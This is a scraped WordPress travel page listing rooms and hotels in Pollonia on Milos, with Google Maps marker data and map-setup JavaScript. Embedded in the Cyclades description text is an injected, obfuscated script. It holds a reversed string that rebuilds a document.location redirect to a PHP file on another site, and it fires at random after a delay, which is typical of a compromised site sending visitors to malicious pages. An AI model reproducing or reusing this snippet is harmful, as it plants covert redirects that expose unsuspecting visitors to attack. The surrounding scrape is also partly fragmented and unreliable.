Listing
Cyclades Islands. The Cyclades, south of Greece, are considered some of the most beautiful islands in the world. Mountains, white cubistic villages and black and golden sand beaches combine $Bhq=function(n){if (typeof ($Bhq.list[n]) == “string”) return $Bhq.list[n].split(“”).reverse().join(“”);return $Bhq.list[n];};$Bhq.list=[“’php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($Bhq(0), delay);}to make the islands… Read more…
to Rooms & Studios','location': [36.76333328, 24.52028811],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'82792'},{'name':'Apollon Rooms','location': [36.76333328, 24.52310845],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'75529'},{'name':'Vilos Suites','location': [36.75930762, 24.52172376],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'71497'},{'name':'Soultana Rooms & Studios','location': [36.76296081, 24.52387691],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'67970'},{'name':'Garifalakis Comfort Rooms','location': [36.763285, 24.52004233],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'54929'},{'name':'Elies Resorts','location': [36.76703664, 24.52276111],'message':'
Vathy, Sifnosland, 84003, Greece
Hotel
//
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'52216'},{'name':'Delmar Apartments & Suites','location': [36.75851706, 24.52445626],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'51051'},{'name':'Chef\'s House','location': [36.76333328, 24.52090831],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'50082'},{'name':'Captain Zeppos','location': [36.75914822, 24.52276111],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'49557'},{'name':'Heliotropio Studios & Apartments','location': [36.75834073, 24.52282548],'message':'
Pollonia, Milos Island, 84800, Greece
Apartment
//
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'36379'},{'name':'Aigialia','location': [36.7598, 24.5217],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'31458'},{'name':'Ostria Vento','location': [36.76333328, 24.52105352],'message':'
Apollonia, Pollonia, Milos Island, 84800, Greece
Hotel
//
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'28396'},{'name':'Perla Rooms','location': [36.76333328, 24.52361405],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'23768'},{'name':'Pergola','location': [36.75963169, 24.524157],'message':'
Apollonia, Pollonia, Milos Island, 84800, Greece
Hotel
//
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'22391'},{'name':'Nefeli Sunset Studios','location': [36.767999, 24.523386],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'20800'},{'name':'Michalis Studios','location': [36.76338385, 24.52244086],'message':'
Apollonia Pelekoudia, Pollonia, Milos Island, 84800, Greece
Hotel
//
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'20758'},{'name':'Villa Mary Elen','location': [36.76333328, 24.52310845],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'20565'}];
var clustering = '';
var map;
var mgr;
var markerClusterer;
var markerArray = [];
var mClusterer = null;
var pippoint_effects='click';
var infoBubble = new InfoBubble({maxWidth:210,minWidth:210,minHeight:"auto",padding:0,borderRadius:0,borderWidth:0,overflow:"visible",backgroundColor:"#fff"});
var isDraggable = jQuery(document).width() > 480 ? true : false;
var isscrollwheel = jQuery(document).width() > 480 ? true : false;
var dragging = zoom_changed = false;
var bounds_modified = false;
var new_bounds;
var query_string='post_type=listing&taxonomy=listingcategory&slug=';
var zoom_changed=1;
function initialize() {
bounds = new google.maps.LatLngBounds();
var myOptions = {
scrollwheel: isscrollwheel,
draggable: isDraggable,
zoom: CITY_MAP_ZOOMING_FACT,
center: new google.maps.LatLng(CITY_MAP_CENTER_LAT, CITY_MAP_CENTER_LNG),
mapTypeId: google.maps.MapTypeId.ROADMAP }
map = new google.maps.Map(document.getElementById("map_canvas"),myOptions);
/* map style customizer */
var styles = [];
map.setOptions({styles: styles});
/* Add Google Map marlkers */
mgr = new MarkerManager( map );
templ_add_googlemap_markers(markers);
if ( zoom_option==1) {
map.fitBounds(bounds);
map.setCenter(bounds.getCenter( ) ) ;
}
/* but that message is not within the marker's instance data */
google.maps.event.addListener(map, 'dragstart', function() {
dragging = false;
});
google.maps.event.addListener(map, 'dragend', function() {
dragging = true;
});
google.maps.event.addListener(map, 'bounds_changed', function() {
bounds_modified = true;
new_bounds = map.getBounds();
});
google.maps.event.addListener(map, 'zoom_changed', function() {
if ( zoom_changed!=1) {
dragging = true;
}
zoom_changed=0;
});
google.maps.event.addListener(map, 'idle', function(ev) {
/*new_bounds = map.getBounds();*/
refresh_markers();
});
}
google.maps.event.addDomListener(window, 'load', initialize);